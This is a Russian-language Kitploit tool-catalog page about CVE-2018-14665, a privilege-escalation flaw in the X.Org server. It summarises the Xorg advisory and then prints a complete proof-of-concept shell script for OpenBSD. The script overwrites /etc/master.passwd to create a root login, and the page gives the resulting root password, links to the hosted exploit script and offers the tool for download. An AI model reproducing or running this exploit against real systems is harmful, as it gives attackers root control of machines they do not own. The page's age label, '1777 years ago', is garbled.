Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2018-14665 — OpenBsd_CVE-2018-14665 | Kitploit
Инструменты/GitHubGitHub/jas502n/cve-2018-14665
Повышение привилегийАнализ уязвимостейЭксплуатацияПост-эксплуатацияТестирование на ПроникновениеRed Teaming
GitHubjas502n/cve-2018-14665

CVE-2018-14665

OpenBsd_CVE-2018-14665

Репозиторий
1777 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2018-14665

0x00 Введение

Индийский исследователь безопасности Нарендра Шинде обнаружил критическую уязвимость повышения привилегий обычного пользователя до root (CVE-2018-14665) в пакете X.Org Server, которая затрагивает основные дистрибутивы Linux, включая OpenBSD, Debian, Ubuntu, CentOS, Red Hat и Fedora.

Проект Xorg X предоставляет реализацию оконной системы X Window с открытым исходным кодом (также известную как X11 или просто X — оконная система для растровых дисплеев). Она обеспечивает базовую среду графического интерфейса: отрисовку и перемещение окон на устройстве отображения, а также взаимодействие с помощью мыши и клавиатуры.

Шинде обнаружил, что X-сервер Xorg некорректно обрабатывает и проверяет аргументы как минимум двух следующих параметров командной строки:

-modulepath: задаёт пути к каталогам для поиска модулей X-сервера,

-logfile: устанавливает новый файл журнала для X-сервера вместо используемого по умолчанию /var/log/Xorg.n.log на большинстве платформ.

По словам Нарендры Шинде, пользователь с низкими привилегиями может использовать это для выполнения вредоносного кода и перезаписи любых файлов в системе.

Более двух лет назад эта уязвимость была внедрена в пакет X.Org Server 1.19.0.

Xorg опубликовал уведомление о безопасности по уязвимости CVE-2018-14665.

root@kitploit:~
«Когда X-сервер запускается с повышенными привилегиями (т.е. Xorg установлен с установленным setuid-битом и запускается от имени не-root пользователя)» — говорится в рекомендации Xorg.

«Параметр -modulepath можно использовать для указания небезопасного пути к модулям, загружаемым в X-сервер, что позволяет выполнять непривилегированный код в привилегированном процессе.

Из-за некорректной проверки при разборе параметров -logfile можно использовать для перезаписи произвольных файлов в файловой системе».

0x01 root

Эксперт по безопасности Мэттью Хики также опубликовал код эксплойта proof-of-concept, позволяющий атакующему взять под контроль уязвимую систему всего 3 или менее командами.

LPE #0day в OpenBSD через CVE-2018-14665 может быть запущен из удалённой SSH-сессии, без необходимости находиться на локальной консоли. Атакующий может буквально взять под контроль уязвимую систему всего 3 командами (или менее).

Скрипт эксплойта: https://hacker.house/releasez/expl0itz/openbsd-0day-cve-2018-14665.sh

POC:

root@kitploit:~
#!/bin/sh
# local privilege escalation in X11 currently
# unpatched in OpenBSD 6.4 stable - exploit
# uses cve-2018-14665 to overwrite files as root. 
# Impacts Xorg 1.19.0 - 1.20.2 which ships setuid
# and vulnerable in default OpenBSD. Errata: was 
# unpatched 0day for a day on release by Xorg for
# OpenBSD systems - patched 26-10-2018.
# 
# Credit for cve-2018-14665 goes to Narendra Shinde.
# Theo explains why this flaw made it into OpenBSD
# stable releases (tested 6.3 & 6.4) as 0day himself 
# here:
#
# https://marc.info/?l=openbsd-tech&r=1&b=201810&w=2
#
# "That is the first localhost root hole in quite a 
# long time." - Theo de Raadt 25/10/18
#
# This exploit works on OpenBSD 6.3 and 6.4, ymmv.
# requires the ability to run "su" and a local
# account. Run this exploit once and it will backup
# the original passwd file to /etc/master.passwd.old
#
# - https://hacker.house
echo [+] OpenBSD 6.4-stable local root exploit
cd /etc
Xorg -fp 'root:$2b$08$As7rA9IO2lsfSyb7OkESWueQFzgbDfCXw0JXjjYszKa8Aklt5RTSG:0:0:daemon:0:0:Charlie &:/root:/bin/ksh' -logfile master.passwd :1 &
sleep 5
pkill Xorg
echo [-] dont forget to mv and chmod /etc/master.passwd.old back 
echo [+] type 'Password1' and hit enter for root
su -

Примечание: после успешного выполнения новый пароль root — Password1, исходный файл /etc/passwd системы будет сохранён как /etc/master.passwd.old

0x02 Ссылки

root@kitploit:~
https://twitter.com/hackerfantastic

https://securityaffairs.co/wordpress/77402/hacking/cve-2018-14665-linux-distros.html

https://hacker.house/releasez/expl0itz/openbsd-0day-cve-2018-14665.sh

Скачать инструмент